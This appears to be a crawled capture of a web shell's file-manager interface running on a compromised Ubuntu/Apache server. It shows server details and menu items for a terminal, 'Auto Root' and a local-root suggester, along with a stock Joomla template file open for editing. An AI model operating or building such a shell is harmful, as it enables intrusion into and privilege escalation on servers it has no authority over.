Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
teste /
templates /
protostar /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
html
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
images
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
img
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
js
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
language
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
less
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
component.php
1.14
KB
-rw-r--r--
2017-10-04 08:52
error.php
8.64
KB
-rw-r--r--
2017-10-04 08:52
favicon.ico
1.97
KB
-rw-r--r--
2017-10-04 08:52
index.php
6.63
KB
-rw-r--r--
2017-10-04 08:52
offline.php
4.94
KB
-rw-r--r--
2017-10-04 08:52
templateDetails.xml
3.64
KB
-rw-r--r--
2017-10-04 08:52
template_preview.png
122.25
KB
-rw-r--r--
2017-10-04 08:52
template_thumbnail.png
8.08
KB
-rw-r--r--
2017-10-04 08:52
Save
Rename
<?php /** * @package Joomla.Site * @subpackage Templates.protostar * * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; /** @var JDocumentHtml $this */ $app = JFactory::getApplication(); // Output as HTML5 $this->setHtml5(true); // Add JavaScript Frameworks JHtml::_('bootstrap.framework'); // Add html5 shiv JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9')); // Add Stylesheets JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true)); // Load optional rtl Bootstrap css and Bootstrap bugfixes JHtmlBootstrap::loadCss($includeMaincss = false, $this->direction); ?> <!DOCTYPE html> <html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <jdoc:include type="head" /> </head> <body class="contentpane modal"> <jdoc:include type="message" /> <jdoc:include type="component" /> </body> </html>